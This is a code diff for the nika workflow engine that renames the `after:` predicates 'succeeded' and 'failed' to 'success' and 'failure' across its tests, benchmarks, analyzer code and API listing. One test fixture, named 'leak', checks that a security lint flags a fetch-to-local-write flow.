--- a/crates/nika-runtime/src/trust.rs
+++ b/crates/nika-runtime/src/trust.rs
@@ -141,7 +141,7 @@ mod tests {
     /// line-strip away): all three legs declared, the realized flow
     /// `fetch_page → leak`, no blocking `nika:prompt` gate → the static
     /// lane names `leak` (NIKA-SEC-009).
-    const TRIFECTA: &str = "nika: v1\nworkflow:\n  id: tri\npermits: { fs: { read: [\"./inbox/**\"], write: [\"./out/**\"] }, net: { http: [\"api.example.com\"] }, tools: [\"nika:fetch\", \"nika:write\"] }\ntasks:\n  fetch_page:\n    invoke: { tool: \"nika:fetch\", args: { url: \"https://api.example.com/data\" } }\n  leak:\n    after: { fetch_page: succeeded }\n    with: { body: \"${{ tasks.fetch_page.output }}\" }\n    invoke: { tool: \"nika:write\", args: { path: \"./out/leak.txt\", content: \"${{ with.body }}\" } }\n";
+    const TRIFECTA: &str = "nika: v1\nworkflow:\n  id: tri\npermits: { fs: { read: [\"./inbox/**\"], write: [\"./out/**\"] }, net: { http: [\"api.example.com\"] }, tools: [\"nika:fetch\", \"nika:write\"] }\ntasks:\n  fetch_page:\n    invoke: { tool: \"nika:fetch\", args: { url: \"https://api.example.com/data\" } }\n  leak:\n    after: { fetch_page: success }\n    with: { body: \"${{ tasks.fetch_page.output }}\" }\n    invoke: { tool: \"nika:write\", args: { path: \"./out/leak.txt\", content: \"${{ with.body }}\" } }\n";
 
     /// The hand-built clean report: `check` refuses the REAL workflow, so
     /// the run is fed the CLEAN report of its permit-free twin — same

--- a/crates/nika-runtime/tests/floor.rs
+++ b/crates/nika-runtime/tests/floor.rs
@@ -73,7 +73,7 @@ tasks:
 
   write_out:
     with: { summary: "${{ tasks.think.output }}" }
-    after: { extract: succeeded }
+    after: { extract: success }
     invoke:
       tool: "nika:write"
       args:
@@ -358,10 +358,10 @@ workflow:
   id: cycle
 tasks:
   a:
-    after: { b: succeeded }
+    after: { b: success }
     exec: { command: ['true'] }
   b:
-    after: { a: succeeded }
+    after: { a: success }
     exec: { command: ['true'] }
 ";
     let wf = parse(dirty, FileId::new(0), ParseMode::Strict).expect("parses");

--- a/crates/nika-runtime/tests/output_fidelity.rs
+++ b/crates/nika-runtime/tests/output_fidelity.rs
@@ -575,10 +575,10 @@ tasks:
     when: "${{ with.s == 'failure' }}"
     invoke: { tool: "nika:jq", args: { input: { x: 2 }, expression: ".x" } }
   doomed:
-    after: { seed: succeeded }
+    after: { seed: success }
     exec: { command: ["false"] }
   downstream:
-    after: { doomed: succeeded }
+    after: { doomed: success }
     invoke: { tool: "nika:jq", args: { input: { x: 3 }, expression: ".x" } }
 "#;
     let wf = nika_schema::parse(

--- a/crates/nika-runtime/tests/properties.rs
+++ b/crates/nika-runtime/tests/properties.rs
@@ -97,11 +97,8 @@ fn yaml_of(specs: &[TaskSpec]) -> String {
                     let _ = writeln!(y, "      b{d}: \"${{{{ tasks.t{d}.output }}}}\"");
                 }
             } else {
-                let entries: Vec<String> = spec
-                    .deps
-                    .iter()
-                    .map(|d| format!("t{d}: succeeded"))
-                    .collect();
+                let entries: Vec<String> =
+                    spec.deps.iter().map(|d| format!("t{d}: success")).collect();
                 let _ = writeln!(y, "    after: {{ {} }}", entries.join(", "));
             }
         }
@@ -249,7 +246,7 @@ proptest! {
         // ── 4 · cascade soundness (GATE-v2 · spec 03 §gate algebra):
         // per-edge pass-sets judge admission — a Normal consumer's value
         // edges pass {success, skipped}; every other kind's `after:
-        // succeeded` edges pass {success} only. Any producer outside a
+        // success` edges pass {success} only. Any producer outside a
         // pass-set cancels the consumer (dead-path elimination,
         // transitive). Admitted: Gated skips (publish=no · POST-gate) ·
         // Fails fails (for_each over a scalar) · Normal/Agent succeed.

--- a/crates/nika-runtime/tests/spec_v2.rs
+++ b/crates/nika-runtime/tests/spec_v2.rs
@@ -141,7 +141,7 @@ tasks:
       c: "${{ tasks.c.output }}"
     exec: { command: ["join", "${{ with.a }}", "${{ with.b }}", "${{ with.c }}"] }
   gated:
-    after: { join: succeeded }
+    after: { join: success }
     when: ${{ const.publish == 'yes' }}
     exec: { command: ["echo", "never"] }
 "#;
@@ -296,7 +296,7 @@ tasks:
   build:
     exec: { command: ["make"] }
   deploy:
-    after: { build: succeeded }
+    after: { build: success }
     exec: { command: ["deploy"] }
   notify:
     after: { build: terminal }
@@ -582,7 +582,7 @@ tasks:
   cached:
     exec: { command: ["cat", "cache.json"] }
   live:
-    after: { cached: succeeded }
+    after: { cached: success }
     on_error: { recover: "${{ tasks.cached.output }}" }
     invoke: { tool: "nika:fetch", args: { url: "https://example.com/a" } }
   optional:
@@ -1084,7 +1084,7 @@ tasks:
         exec: { command: ["alert", "on-call"] }
       - exec: { command: ["rm", "-f", "scratch-b"] }
   never_ran:
-    after: { breaks: succeeded }
+    after: { breaks: success }
     exec: { command: ["downstream"] }
     on_finally:
       - exec: { command: ["must", "not", "run"] }

--- a/crates/nika-schema/benches/parse_bench.rs
+++ b/crates/nika-schema/benches/parse_bench.rs
@@ -45,7 +45,7 @@ tasks:
             items: { type: string }
           count: { type: integer }
   report:
-    after: { extract: succeeded }
+    after: { extract: success }
     exec:
       shell: "report ${{ tasks.extract.output.entities }} (${{ tasks.extract.output.count }})"
 "#;
@@ -64,7 +64,7 @@ fn large_workflow(n: usize) -> String {
         s.push_str("  report_");
         s.push_str(&i.to_string());
         s.push_str(
-            ":\n    after: { extract: succeeded }\n    exec:\n      \
+            ":\n    after: { extract: success }\n    exec:\n      \
              command: [\"report\", \"${{ tasks.extract.output.entities }}\"]\n",
         );
     }

--- a/crates/nika-schema/benches/parser_bench.rs
+++ b/crates/nika-schema/benches/parser_bench.rs
@@ -28,7 +28,7 @@ fn chain_yaml(n: usize) -> String {
     for i in 0..n {
         let _ = writeln!(s, "  t{i}:");
         if i > 0 {
-            let _ = writeln!(s, "    after: {{ t{}: succeeded }}", i - 1);
+            let _ = writeln!(s, "    after: {{ t{}: success }}", i - 1);
         }
         s.push_str("    infer:\n      prompt: \"step\"\n      max_tokens: 64\n");
     }

--- a/crates/nika-schema/benches/refonte_baseline.rs
+++ b/crates/nika-schema/benches/refonte_baseline.rs
@@ -78,10 +78,7 @@ fn workflow(topology: &str, n: usize) -> String {
         };
         s.push_str(&format!("  t{i}:\n"));
         if !deps.is_empty() {
-            let rest: Vec<String> = deps[1..]
-                .iter()
-                .map(|d| format!("t{d}: succeeded"))
-                .collect();
+            let rest: Vec<String> = deps[1..].iter().map(|d| format!("t{d}: success")).collect();
             if !rest.is_empty() {
                 s.push_str(&format!("    after: {{ {} }}\n", rest.join(", ")));
             }

--- a/crates/nika-schema/examples/check/render.rs
+++ b/crates/nika-schema/examples/check/render.rs
@@ -595,7 +595,7 @@ mod tests {
 
     /// A chrome-only workflow (no findings · no hints): every rendered
     /// byte is OURS, so the snapshots pin the frame, not library text.
-    const CHROME_ONLY: &str = "nika: v1\nworkflow:\n  id: pipeline\npermits: { exec: [\"true\"] }\ntasks:\n  first:\n    exec: { command: [\"true\"] }\n  second:\n    after: { first: succeeded }\n    exec: { command: [\"true\"] }\n";
+    const CHROME_ONLY: &str = "nika: v1\nworkflow:\n  id: pipeline\npermits: { exec: [\"true\"] }\ntasks:\n  first:\n    exec: { command: [\"true\"] }\n  second:\n    after: { first: success }\n    exec: { command: [\"true\"] }\n";
 
     fn rendered(t: Theme) -> String {
         let wf = parse(CHROME_ONLY, FileId::new(0), ParseMode::Strict).expect("parse");
@@ -657,7 +657,7 @@ mod tests {
         // p→a1→x2 · p→x1 · isolated x0: Kahn waves peak at 2, the exact
         // antichain width is 3 — BOTH renderers must say so (this is
         // the example renderer's half; verbs/check.rs has the CLI's).
-        let yaml = "nika: v1\nworkflow:\n  id: wide\npermits: { exec: [\"true\"] }\ntasks:\n  p:\n    exec: { command: [\"true\"] }\n  x0:\n    exec: { command: [\"true\"] }\n  a1:\n    after: { p: succeeded }\n    exec: { command: [\"true\"] }\n  x1:\n    after: { p: succeeded }\n    exec: { command: [\"true\"] }\n  x2:\n    after: { a1: succeeded }\n    exec: { command: [\"true\"] }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: wide\npermits: { exec: [\"true\"] }\ntasks:\n  p:\n    exec: { command: [\"true\"] }\n  x0:\n    exec: { command: [\"true\"] }\n  a1:\n    after: { p: success }\n    exec: { command: [\"true\"] }\n  x1:\n    after: { p: success }\n    exec: { command: [\"true\"] }\n  x2:\n    after: { a1: success }\n    exec: { command: [\"true\"] }\n";
         let wf = parse(yaml, FileId::new(0), ParseMode::Strict).expect("parse");
         let report = check(&wf);
         let analysis = report.analysis.as_ref().expect("conformant -> analysis");

--- a/crates/nika-schema/examples/check/snippet.rs
+++ b/crates/nika-schema/examples/check/snippet.rs
@@ -9,7 +9,7 @@
 //!
 //! ```text
 //!     ┌─ demo.nika.yaml:9:19
-//!     │   after: { extarct: succeeded }
+//!     │   after: { extarct: success }
 //!     │                ^^^^^^^
 //! ```
 //!
@@ -102,8 +102,7 @@ pub(crate) fn render_snippet(
 mod tests {
     use super::*;
 
-    const SRC: &str =
-        "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: succeeded }\n";
+    const SRC: &str = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: success }\n";
 
     fn snip(span: ByteSpan, unicode: bool) -> String {
         let mut out = String::new();
@@ -124,7 +123,7 @@ mod tests {
         let s = snip(ByteSpan::new(ghost as u32, (ghost + 5) as u32), true);
         let expected = concat!(
             "          ┌─ w.nika.yaml:6:14\n",
-            "          │       after: { ghost: succeeded }\n",
+            "          │       after: { ghost: success }\n",
             "          │                ^^^^^\n",
         );
         assert_eq!(s, expected);

--- a/crates/nika-schema/public-api.txt
+++ b/crates/nika-schema/public-api.txt
@@ -2315,6 +2315,7 @@ pub nika_schema::error::SchemaError::TypeUndecodable::decode: alloc::string::Str
 pub nika_schema::error::SchemaError::TypeUndecodable::span: core::option::Option<nika_source::span::Span>
 pub nika_schema::error::SchemaError::TypeUndecodable::task: alloc::string::String
 pub nika_schema::error::SchemaError::UnknownAfterPredicate
+pub nika_schema::error::SchemaError::UnknownAfterPredicate::message: alloc::string::String
 pub nika_schema::error::SchemaError::UnknownAfterPredicate::predicate: alloc::string::String
 pub nika_schema::error::SchemaError::UnknownAfterPredicate::span: core::option::Option<nika_source::span::Span>
 pub nika_schema::error::SchemaError::UnknownAfterPredicate::target: alloc::string::String
@@ -4112,6 +4113,7 @@ pub nika_schema::SchemaError::TypeUndecodable::decode: alloc::string::String
 pub nika_schema::SchemaError::TypeUndecodable::span: core::option::Option<nika_source::span::Span>
 pub nika_schema::SchemaError::TypeUndecodable::task: alloc::string::String
 pub nika_schema::SchemaError::UnknownAfterPredicate
+pub nika_schema::SchemaError::UnknownAfterPredicate::message: alloc::string::String
 pub nika_schema::SchemaError::UnknownAfterPredicate::predicate: alloc::string::String
 pub nika_schema::SchemaError::UnknownAfterPredicate::span: core::option::Option<nika_source::span::Span>
 pub nika_schema::SchemaError::UnknownAfterPredicate::target: alloc::string::String

--- a/crates/nika-schema/src/analyzer/dag.rs
+++ b/crates/nika-schema/src/analyzer/dag.rs
@@ -268,7 +268,7 @@ mod tests {
     with: {{ page: \"${{{{ tasks.fetch.output }}}}\" }}
     exec: {{ command: [echo] }}
   report:
-    after: {{ mid: succeeded }}
+    after: {{ mid: success }}
     exec: {{ command: [echo] }}
 "
         );
@@ -295,7 +295,7 @@ mod tests {
       recover:
         - \"${{{{ tasks.report.output }}}}\"
   mid:
-    after: {{ fetch: succeeded }}
+    after: {{ fetch: success }}
     exec: {{ command: [echo] }}
   report:
     with: {{ notes: \"${{{{ tasks.mid.output }}}}\" }}
@@ -322,7 +322,7 @@ mod tests {
   base:
     exec: {{ command: [echo] }}
   other:
-    after: {{ base: succeeded }}
+    after: {{ base: success }}
     exec: {{ command: [echo] }}
   fetch:
     invoke: {{ tool: \"nika:fetch\", args: {{ url: \"https://x.example\" }} }}
@@ -358,10 +358,10 @@ mod tests {
         let yaml = format!(
             "{HEADER}tasks:
   a:
-    after: {{ b: succeeded }}
+    after: {{ b: success }}
     exec: {{ command: [echo] }}
   b:
-    after: {{ a: succeeded }}
+    after: {{ a: success }}
     exec: {{ command: [echo] }}
 "
         );
@@ -384,7 +384,7 @@ mod tests {
     with: {{ b_out: \"${{{{ tasks.b.output }}}}\" }}
     exec: {{ command: [echo] }}
   b:
-    after: {{ a: succeeded }}
+    after: {{ a: success }}
     exec: {{ command: [echo] }}
 "
         );
@@ -404,10 +404,10 @@ mod tests {
         let yaml = format!(
             "{HEADER}tasks:
   a:
-    after: {{ b: succeeded }}
+    after: {{ b: success }}
     exec: {{ command: [echo] }}
   b:
-    after: {{ a: succeeded }}
+    after: {{ a: success }}
     exec: {{ command: [echo] }}
 "
         );
@@ -433,7 +433,7 @@ mod tests {
         let yaml = format!(
             "{HEADER}tasks:
   a:
-    after: {{ a: succeeded }}
+    after: {{ a: success }}
     exec: {{ command: [echo] }}
 "
         );
@@ -452,7 +452,7 @@ mod tests {
         let yaml = format!(
             "{HEADER}tasks:
   a:
-    after: {{ ghost: succeeded }}
+    after: {{ ghost: success }}
     exec: {{ command: [echo] }}
 "
         );
@@ -494,10 +494,10 @@ mod tests {
   a:
     exec: {{ command: [echo] }}
   b:
-    after: {{ a: succeeded }}
+    after: {{ a: success }}
     exec: {{ command: [echo] }}
   c:
-    after: {{ a: succeeded }}
+    after: {{ a: success }}
     exec: {{ command: [echo] }}
   d:
     with:

--- a/crates/nika-schema/src/analyzer/edges.rs
+++ b/crates/nika-schema/src/analyzer/edges.rs
@@ -73,8 +73,8 @@ impl EdgeKind {
             Self::TerminalObservation => true,
             Self::FailureObservation => matches!(s, Failure | Skipped),
             Self::Control(p) => match p {
-                AfterPredicate::Succeeded => matches!(s, Success),
-                AfterPredicate::Failed => matches!(s, Failure),
+                AfterPredicate::Success => matches!(s, Success),
+                AfterPredicate::Failure => matches!(s, Failure),
                 AfterPredicate::Skipped => matches!(s, Skipped),
                 AfterPredicate::Terminal => {
                     matches!(s, Success | Failure | Skipped | Cancelled)
@@ -372,9 +372,9 @@ mod tests {
         assert_eq!(admit(EdgeKind::FailureObservation), 2);
         assert!(EdgeKind::FailureObservation.admits(Skipped));
         assert!(EdgeKind::Control(AfterPredicate::Terminal).admits(Cancelled));
-        assert!(!EdgeKind::Control(AfterPredicate::Succeeded).admits(Skipped));
+        assert!(!EdgeKind::Control(AfterPredicate::Success).admits(Skipped));
         assert!(EdgeKind::Control(AfterPredicate::Skipped).admits(Skipped));
-        assert!(EdgeKind::Control(AfterPredicate::Failed).admits(Failure));
+        assert!(EdgeKind::Control(AfterPredicate::Failure).admits(Failure));
     }
 
     #[test]

--- a/crates/nika-schema/src/analyzer/mod.rs
+++ b/crates/nika-schema/src/analyzer/mod.rs
@@ -283,7 +283,7 @@ tasks:
   test:
     exec: { command: [\"./test.sh\"] }
   deploy:
-    after: { test: succeeded }
+    after: { test: success }
     when: ${{ tasks.test.status == 'success' }}
     exec: { command: [\"./deploy.sh\"] }
 ";
@@ -427,7 +427,7 @@ tasks:
     #[test]
     fn tightened_value_edge_is_valid() {
         // Conformance fixture dag-topology/009-valid-tightened-value-edge ·
-        // `after: {fetch: succeeded}` BESIDE the value edge is a meaningful
+        // `after: {fetch: success}` BESIDE the value edge is a meaningful
         // tightening (edges compose by intersection · spec 03 §after).
         let yaml = "\
 nika: v1
@@ -437,7 +437,7 @@ tasks:
   fetch:
     invoke: { tool: \"nika:fetch\", args: { url: \"https://x.io\" } }
   use:
-    after: { fetch: succeeded }
+    after: { fetch: success }
     with:
       data: ${{ tasks.fetch.output }}
     infer: { prompt: \"use ${{ with.data }}\" }
@@ -1022,7 +1022,7 @@ tasks:
   extract:
     exec: { command: [echo] }
   report:
-    after: { extarct: succeeded }
+    after: { extarct: success }
     with:
       data: ${{ tasks.extract.output }}
     exec: { command: [\"echo\", \"${{ inputs.topci }}\", \"${{ with.data }}\"] }
@@ -1096,7 +1096,7 @@ workflow:
   id: t
 tasks:
   a:
-    after: { ghost: succeeded }
+    after: { ghost: success }
     when: ${{ vars.nope }}
     exec: { command: [echo] }
 ";

--- a/crates/nika-schema/src/check/analysis.rs
+++ b/crates/nika-schema/src/check/analysis.rs
@@ -459,7 +459,7 @@ mod tests {
         let dep_line = if deps.is_empty() {
             String::new()
         } else {
-            let entries: Vec<String> = deps.iter().map(|d| format!("{d}: succeeded")).collect();
+            let entries: Vec<String> = deps.iter().map(|d| format!("{d}: success")).collect();
             format!("    after: {{ {} }}\n", entries.join(", "))
         };
         format!("  {id}:\n{dep_line}    infer:\n      prompt: \"x\"\n")
@@ -613,7 +613,7 @@ mod tests {
     #[test]
     fn ordered_writers_are_not_a_race() {
         let yaml = format!(
-            "{HEADER}  first:\n    invoke:\n      tool: nika:write\n      args:\n        path: out/report.md\n        content: \"a\"\n  second:\n    after: {{ first: succeeded }}\n    invoke:\n      tool: nika:write\n      args:\n        path: out/report.md\n        content: \"b\"\n"
+            "{HEADER}  first:\n    invoke:\n      tool: nika:write\n      args:\n        path: out/report.md\n        content: \"a\"\n  second:\n    after: {{ first: success }}\n    invoke:\n      tool: nika:write\n      args:\n        path: out/report.md\n        content: \"b\"\n"
         );
         assert!(read(&yaml).conflicts.is_empty());
     }

--- a/crates/nika-schema/src/check/certificate.rs
+++ b/crates/nika-schema/src/check/certificate.rs
@@ -585,7 +585,7 @@ mod tests {
     #[test]
     fn plain_pipeline_has_exact_constant_bounds() {
         let c = cert(&wf(
-            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    invoke: { tool: \"nika:read\", args: { path: \"./x\" } }\n",
+            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    invoke: { tool: \"nika:read\", args: { path: \"./x\" } }\n",
         ));
         assert_eq!(c.task_attempts, konst(2));
         assert_eq!(c.llm_calls, konst(0));
@@ -738,14 +738,14 @@ mod tests {
     fn span_is_the_longest_dependency_chain_in_attempts() {
         // chain a→b→c with retries: span = 1 + 3 + 2 = 6 = work
         let chain = cert(&wf(
-            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    retry: { max_attempts: 3 }\n    exec: { command: [\"true\"] }\n  c:\n    after: { b: succeeded }\n    retry: { max_attempts: 2 }\n    exec: { command: [\"true\"] }\n",
+            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    retry: { max_attempts: 3 }\n    exec: { command: [\"true\"] }\n  c:\n    after: { b: success }\n    retry: { max_attempts: 2 }\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(chain.span_attempts, 6);
         assert_eq!(chain.task_attempts, konst(6), "a pure chain: span == work");
 
         // diamond a→{b,c}→d: span = longest branch (1+3+1), work = sum
         let diamond = cert(&wf(
-            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    retry: { max_attempts: 3 }\n    exec: { command: [\"true\"] }\n  c:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n  d:\n    after: { b: succeeded, c: succeeded }\n    exec: { command: [\"true\"] }\n",
+            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    retry: { max_attempts: 3 }\n    exec: { command: [\"true\"] }\n  c:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n  d:\n    after: { b: success, c: success }\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(diamond.span_attempts, 5, "longest branch: 1+3+1");
         assert_eq!(diamond.task_attempts, konst(6), "work: 1+3+1+1");
@@ -756,7 +756,7 @@ mod tests {
         // a for_each over 4 elements: work ×4, span unchanged (the
         // elements run in parallel — Brent: parallelism = work/span)
         let c = cert(&wf(
-            "  a:\n    exec: { command: [\"true\"] }\n  fan:\n    after: { a: succeeded }\n    for_each: [\"w\", \"x\", \"y\", \"z\"]\n    exec: { command: [\"true\"] }\n",
+            "  a:\n    exec: { command: [\"true\"] }\n  fan:\n    after: { a: success }\n    for_each: [\"w\", \"x\", \"y\", \"z\"]\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(c.task_attempts, konst(5), "work: 1 + 4");
         assert_eq!(c.span_attempts, 2, "span: 1 + 1 (elements parallel)");
@@ -765,7 +765,7 @@ mod tests {
     #[test]
     fn audit_catches_span_and_dep_tampering() {
         let yaml = wf(
-            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n",
+            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n",
         );
         let parsed = parse(&yaml, FileId::new(0), ParseMode::Strict).expect("parse");
         let honest = certify(&parsed);
@@ -826,7 +826,7 @@ mod tests {
         // boundary declares all three trifecta legs (fs.read · tools ·
         // exec), so the exec sits behind a blocking `nika:prompt` gate —
         // otherwise NIKA-SEC-009 flags it and the fixture is not clean.
-        let yaml = "nika: v1\nworkflow:\n  id: w\npermits:\n  fs: { read: [\"./data/**\"] }\n  exec: [\"git\"]\n  tools: [\"nika:read\", \"nika:prompt\"]\ntasks:\n  a:\n    invoke: { tool: \"nika:read\", args: { path: \"./data/in.txt\" } }\n  ask:\n    invoke:\n      tool: \"nika:prompt\"\n      args: { message: \"run git status?\" }\n  b:\n    after: { ask: succeeded }\n    exec: { command: [\"git\", \"status\"] }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: w\npermits:\n  fs: { read: [\"./data/**\"] }\n  exec: [\"git\"]\n  tools: [\"nika:read\", \"nika:prompt\"]\ntasks:\n  a:\n    invoke: { tool: \"nika:read\", args: { path: \"./data/in.txt\" } }\n  ask:\n    invoke:\n      tool: \"nika:prompt\"\n      args: { message: \"run git status?\" }\n  b:\n    after: { ask: success }\n    exec: { command: [\"git\", \"status\"] }\n";
         let parsed = parse(yaml, FileId::new(0), ParseMode::Strict).expect("parse");
         let report = crate::check(&parsed);
         assert!(report.is_clean(), "the fixture fits its boundary");
@@ -1081,7 +1081,7 @@ mod tests {
     fn span_traverses_deps_declared_after_their_dependents() {
         // c → b → a, written c first: forces the push branch to matter
         let c = cert(&wf(
-            "  c:\n    after: { b: succeeded }\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n  a:\n    exec: { command: [\"true\"] }\n",
+            "  c:\n    after: { b: success }\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n  a:\n    exec: { command: [\"true\"] }\n",
         ));
         // chain of 3 single-attempt tasks → span = 1+1+1 = 3
         assert_eq!(
@@ -1101,7 +1101,7 @@ mod tests {
         // a depends on b, b depends on a — a cycle (conformance rejects it
         // elsewhere; span must still TERMINATE with a finite value)
         let c = cert(&wf(
-            "  a:\n    after: { b: succeeded }\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n",
+            "  a:\n    after: { b: success }\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n",
         ));
         // with the cut, each node's chain stops at the visiting mark:
         // span = 1 + 1 = 2 (one hop before the back-edge is cut). The key

--- a/crates/nika-schema/src/check/hints.rs
+++ b/crates/nika-schema/src/check/hints.rs
@@ -30,7 +30,7 @@
 //! - **non-tightening after** (`redundant-gate`) — `after: {x:
 //!   terminal}` beside a value edge to `x` changes nothing (edges
 //!   compose by intersection · spec 03 §one obvious way /008): tighten
-//!   to `succeeded` or drop the entry.
+//!   to `success` or drop the entry.
 //! - **retry on uncontracted effects** (`retry-effects`) — see
 //!   [`push_retry_effects_hint`].
 //! - **concurrent same-path writers** (`parallel-writers`) — emitted by
@@ -171,7 +171,7 @@ pub(super) fn scan_hints(wf: &RawWorkflow) -> Vec<Hint> {
 /// The `redundant-gate` hint (6. non-tightening after) — `after:
 /// {x: terminal}` beside a value edge changes nothing (edges compose by
 /// intersection: {success, skipped} ∩ terminal = the value edge alone ·
-/// one-obvious-way/008); tighten to `succeeded` or drop it.
+/// one-obvious-way/008); tighten to `success` or drop it.
 fn push_redundant_gate_hints(hints: &mut Vec<Hint>, t: &RawTask, id: &str) {
     for (target, pred) in &t.after {
         if !matches!(pred.value, crate::types::AfterPredicate::Terminal) {
@@ -193,7 +193,7 @@ fn push_redundant_gate_hints(hints: &mut Vec<Hint>, t: &RawTask, id: &str) {
                 kind: "redundant-gate",
                 task: id.to_owned(),
                 advice: format!(
-                    "`after: {{{t}: terminal}}` beside a value edge to `{t}` is a non-tightening restatement \u{2014} the composed gate is the value edge's {{success, skipped}} either way (spec 03 \u{a7}one obvious way /010); drop the entry or tighten to `succeeded`",
+                    "`after: {{{t}: terminal}}` beside a value edge to `{t}` is a non-tightening restatement \u{2014} the composed gate is the value edge's {{success, skipped}} either way (spec 03 \u{a7}one obvious way /010); drop the entry or tighten to `success`",
                     t = target.value
                 ),
             });
@@ -747,17 +747,17 @@ mod tests {
             .iter()
             .find(|x| x.kind == "redundant-gate" && x.task == "b")
             .expect("the /008 hint fires");
-        assert!(hit.advice.contains("succeeded"), "{hit:?}");
+        assert!(hit.advice.contains("tighten to `success`"), "{hit:?}");
     }
 
     #[test]
-    fn tightening_after_succeeded_beside_value_edge_is_meaningful() {
-        // `succeeded` NARROWS the composed gate ({success, skipped} ∩
+    fn tightening_after_success_beside_value_edge_is_meaningful() {
+        // `success` NARROWS the composed gate ({success, skipped} ∩
         // {success} = {success} — the skipped-null case is excluded), so
         // the restatement is meaningful; the spec's own tightened form
         // (conformance dag-topology/009) must never be flagged.
         let h = hints_of(
-            "nika: v1\nworkflow:\n  id: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  a:\n    exec: { shell: \"true\" }\n  b:\n    after: { a: succeeded }\n    with: { data: \"${{ tasks.a.output }}\" }\n    exec: { shell: \"true\" }\n",
+            "nika: v1\nworkflow:\n  id: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  a:\n    exec: { shell: \"true\" }\n  b:\n    after: { a: success }\n    with: { data: \"${{ tasks.a.output }}\" }\n    exec: { shell: \"true\" }\n",
         );
         assert!(!h.iter().any(|x| x.kind == "redundant-gate"), "{h:?}");
     }
@@ -1057,7 +1057,7 @@ mod tests {
         // builtins carry documented idempotent semantics · max_attempts
         // 1 is no retry at all — none of these hint.
         let h = hints_of(
-            "nika: v1\nworkflow:\n  id: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  ask:\n    retry: { max_attempts: 3 }\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n  save:\n    retry: { max_attempts: 3 }\n    with: { content: \"${{ tasks.ask.output }}\" }\n    invoke:\n      tool: nika:write\n      args: { path: out.md, content: \"${{ with.content }}\" }\n  once:\n    retry: { max_attempts: 1 }\n    after: { save: succeeded }\n    exec: { shell: \"true\" }\n",
+            "nika: v1\nworkflow:\n  id: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  ask:\n    retry: { max_attempts: 3 }\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n  save:\n    retry: { max_attempts: 3 }\n    with: { content: \"${{ tasks.ask.output }}\" }\n    invoke:\n      tool: nika:write\n      args: { path: out.md, content: \"${{ with.content }}\" }\n  once:\n    retry: { max_attempts: 1 }\n    after: { save: success }\n    exec: { shell: \"true\" }\n",
         );
         assert!(!h.iter().any(|x| x.kind == "retry-effects"), "{h:?}");
     }

--- a/crates/nika-schema/src/check/mod.rs
+++ b/crates/nika-schema/src/check/mod.rs
@@ -538,7 +538,7 @@ workflow:
   id: t
 tasks:
   a:
-    after: { ghost: succeeded }
+    after: { ghost: success }
     exec: { command: [\"echo\", \"hi\"] }
 ",
         );
@@ -602,7 +602,7 @@ tasks:
     with: { content: "${{ tasks.extract.output.sumarry }}" }
     invoke: { tool: "nika:wrte", args: { path: "./out.md", content: "${{ with.content }}" } }
   push:
-    after: { save: succeeded }
+    after: { save: success }
     exec: { command: ["cargo", "publish"] }
 "#;
         let wf = parse(broken, FileId::new(0), ParseMode::Strict).expect("parse");
@@ -664,10 +664,10 @@ workflow:
   id: cyclic
 tasks:
   a:
-    after: { b: succeeded }
+    after: { b: success }
     exec: { command: [\"x\"] }
   b:
-    after: { a: succeeded }
+    after: { a: success }
     exec: { command: [\"y\"] }
 ",
             FileId::new(0),
@@ -690,7 +690,7 @@ tasks:
     fn broken_dag_still_yields_every_dag_independent_finding() {
         // ONE round-trip: the agent gets the conformance violation AND
         // the tool typo AND the schema defect AND the hints, together.
-        let src = "nika: v1\nworkflow:\n  id: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  a:\n    after: { ghost: succeeded }\n    invoke: { tool: \"nika:raed\", args: { path: \"./x\" } }\n  b:\n    infer:\n      prompt: \"x\"\n      schema:\n        type: object\n        properties:\n          s: { type: string }\n        required: [z]\n";
+        let src = "nika: v1\nworkflow:\n  id: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  a:\n    after: { ghost: success }\n    invoke: { tool: \"nika:raed\", args: { path: \"./x\" } }\n  b:\n    infer:\n      prompt: \"x\"\n      schema:\n        type: object\n        properties:\n          s: { type: string }\n        required: [z]\n";
         let r = check_yaml(src);
         assert!(
             r.conformance.iter().any(|c| c.code == "NIKA-DAG-002"),
@@ -732,7 +732,7 @@ tasks:
         // Two independent check() runs over the same input must render
         // byte-identical JSON — pins the BTree-everywhere discipline (a
         // stray HashMap would randomize field/finding order run-to-run).
